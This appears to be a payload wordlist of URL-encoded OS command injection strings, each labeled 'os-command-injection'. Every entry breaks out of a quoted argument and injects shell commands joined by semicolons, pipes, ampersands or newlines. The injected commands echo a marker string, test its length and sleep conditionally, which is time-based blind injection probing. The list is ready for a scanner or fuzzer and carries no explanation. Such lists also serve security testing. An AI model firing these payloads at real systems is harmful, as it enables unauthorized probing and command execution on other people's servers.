+os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' 